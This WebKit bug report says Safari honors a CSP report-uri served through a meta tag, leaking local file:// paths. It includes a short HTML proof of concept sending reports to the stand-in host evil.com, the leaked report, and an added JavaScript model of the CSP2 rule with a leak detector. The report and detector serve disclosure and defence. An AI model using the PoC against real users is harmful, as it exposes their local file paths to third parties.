<html>
    <head>
      <base href="https://bugs.webkit.org/" />
    </head>
    <body><table border="1" cellspacing="0" cellpadding="8">
        <tr>
          <th>Bug ID</th>
          <td><a class="bz_bug_link 
          bz_status_NEW "
   title="NEW - CSP: report-uri is honored even if CSP is served via &lt;meta&gt; tag, leaking full file:// paths as document-uri"
   href="https://bugs.webkit.org/show_bug.cgi?id=158263">158263</a>
          </td>
        </tr>

        <tr>
          <th>Summary</th>
          <td>CSP: report-uri is honored even if CSP is served via &lt;meta&gt; tag, leaking full file:// paths as document-uri
          </td>
        </tr>

        <tr>
          <th>Classification</th>
          <td>Unclassified
          </td>
        </tr>

        <tr>
          <th>Product</th>
          <td>WebKit
          </td>
        </tr>

        <tr>
          <th>Version</th>
          <td>WebKit Local Build
          </td>
        </tr>

        <tr>
          <th>Hardware</th>
          <td>Unspecified
          </td>
        </tr>

        <tr>
          <th>OS</th>
          <td>OS X 10.11
          </td>
        </tr>

        <tr>
          <th>Status</th>
          <td>NEW
          </td>
        </tr>

        <tr>
          <th>Severity</th>
          <td>Normal
          </td>
        </tr>

        <tr>
          <th>Priority</th>
          <td>P2
          </td>
        </tr>

        <tr>
          <th>Component</th>
          <td>WebCore Misc.
          </td>
        </tr>

        <tr>
          <th>Assignee</th>
          <td>webkit-unassigned&#64;lists.webkit.org
          </td>
        </tr>

        <tr>
          <th>Reporter</th>
          <td>mikispag&#64;gmail.com
          </td>
        </tr></table>
      <p>
        <div>
<pre>Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via &lt;meta&gt; tag, even though the specification explicitly prohibits honoring report-uri if the policy is served via &lt;meta&gt; tag[1].

PoC:

report-uri.html
----------------

&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;img-src 'none'; report-uri <a href="https://evil.com/csp">https://evil.com/csp</a>&quot;&gt;
    &lt;title&gt;CSP report-uri demo&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;img src=&quot;cat.jpg&quot; alt=&quot;A nice cat&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;

This is the report sent to a remote report-uri:

{&quot;csp-report&quot;:{&quot;document-uri&quot;:&quot;file:///Users/mikispag/CSP/report-uri.html&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;violated-directive&quot;:&quot;img-src 'none'&quot;,&quot;original-policy&quot;:&quot;img-src 'none'; report-uri <a href="https://evil.com/csp">https://evil.com/csp</a>&quot;,&quot;blocked-uri&quot;:&quot;file&quot;}}

[1] <a href="https://www.w3.org/TR/CSP2/#directive-report-uri">https://www.w3.org/TR/CSP2/#directive-report-uri</a></pre>
        </div>
      </p>
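<p>The following is an added example, not code from the bug report above or from WebKit. It models, in plain JavaScript (runs under Node or in a browser console), the CSP2 delivery rule the reporter cites: a user agent must ignore <code>report-uri</code> when the policy is delivered through a <code>&lt;meta&gt;</code> element (CSP2 states the same for <code>frame-ancestors</code> and <code>sandbox</code>), so no report should ever be sent for the PoC page. It also shows the check a report collector can run to spot reports whose <code>document-uri</code> exposes a local filesystem path, using the report quoted above as input. The function names (<code>parsePolicy</code>, <code>enforcePolicy</code>, <code>reportEndpoint</code>, <code>documentUriLeaksLocalPath</code>) are this example's own.</p>

```javascript
// Added example, not code from the bug report or from WebKit: a model of the
// CSP2 delivery rule the report above says Safari violates, plus a
// collector-side check that flags reports exposing a local file path.
// Function names here (parsePolicy, enforcePolicy, reportEndpoint,
// documentUriLeaksLocalPath) are this example's own; SAMPLE_REPORT is the
// report quoted in the bug above.

// Directives CSP2 tells a user agent to ignore when the policy arrives in a
// <meta http-equiv="Content-Security-Policy"> element rather than a header.
const META_IGNORED_DIRECTIVES = new Set(['report-uri', 'frame-ancestors', 'sandbox']);

// Parse a serialized policy into ordered {name, value} directives.
// Directives are ';'-separated; the first token is the (case-insensitive)
// name, and a repeated name is ignored after its first occurrence.
function parsePolicy(serialized) {
  const directives = [];
  const seen = new Set();
  for (const raw of serialized.split(';')) {
    const token = raw.trim();
    if (token === '') continue;
    const [name, ...rest] = token.split(/\s+/);
    const lower = name.toLowerCase();
    if (seen.has(lower)) continue;
    seen.add(lower);
    directives.push({ name: lower, value: rest.join(' ') });
  }
  return directives;
}

// Apply the delivery-channel rule. `delivery` is 'header' or 'meta'.
// Returns the directives that stay in force and the names that were dropped.
function enforcePolicy(serialized, delivery) {
  const parsed = parsePolicy(serialized);
  if (delivery !== 'meta') return { effective: parsed, dropped: [] };
  const effective = [];
  const dropped = [];
  for (const directive of parsed) {
    if (META_IGNORED_DIRECTIVES.has(directive.name)) {
      dropped.push(directive.name);
    } else {
      effective.push(directive);
    }
  }
  return { effective, dropped };
}

// Where violation reports would be sent under the effective policy, or null
// if reporting is disabled (the correct answer for any <meta> policy).
function reportEndpoint(effective) {
  const directive = effective.find((d) => d.name === 'report-uri');
  return directive ? directive.value : null;
}

// Collector-side check: does this report's document-uri expose a local
// filesystem path? A conforming browser never sends a report for a <meta>
// policy, so receiving one with a file: document-uri is itself a finding.
function documentUriLeaksLocalPath(reportJson) {
  const body = JSON.parse(reportJson)['csp-report'];
  if (!body || typeof body['document-uri'] !== 'string') return false;
  let url;
  try {
    url = new URL(body['document-uri']);
  } catch (e) {
    return false; // not an absolute URL, nothing to leak
  }
  return url.protocol === 'file:' && url.pathname !== '/';
}

// The report quoted in the bug above (copied from the page, not constructed).
const SAMPLE_REPORT = JSON.stringify({
  'csp-report': {
    'document-uri': 'file:///Users/mikispag/CSP/report-uri.html',
    referrer: '',
    'violated-directive': "img-src 'none'",
    'original-policy': "img-src 'none'; report-uri https://evil.com/csp",
    'blocked-uri': 'file',
  },
});

const POLICY = "img-src 'none'; report-uri https://evil.com/csp";
const viaMeta = enforcePolicy(POLICY, 'meta');
const viaHeader = enforcePolicy(POLICY, 'header');
console.log('meta   -> report-uri:', reportEndpoint(viaMeta.effective), 'dropped:', viaMeta.dropped);
console.log('header -> report-uri:', reportEndpoint(viaHeader.effective));
console.log('report leaks local path:', documentUriLeaksLocalPath(SAMPLE_REPORT));
```

<p>Run with <code>node</code>: the same policy string yields a report endpoint when treated as a header and none when treated as a <code>&lt;meta&gt;</code> policy, which is the behaviour the bug says Safari lacks. The collector check treats any <code>file:</code> <code>document-uri</code> as a leak, since a browser following the rule above would never have sent that report in the first place.</p>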
    </body>
</html>